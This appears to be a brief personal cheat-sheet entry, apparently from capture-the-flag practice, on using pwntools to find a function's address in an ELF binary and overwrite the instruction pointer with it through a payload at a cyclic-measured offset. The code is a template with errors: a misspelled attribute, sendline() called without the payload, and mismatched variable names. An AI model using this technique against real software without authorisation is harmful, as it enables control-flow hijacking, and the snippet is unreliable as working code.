pwntools
Memory Addresses of ELF Binary
- Find address of function and use it on $eip
p = process(<binary>)
elf = ELF(<binary>)
__function = elf.symbol.<functionName>
payload = fit({
42: __function # Length measured via cyclic
})
p.sendline()
proc.interactive()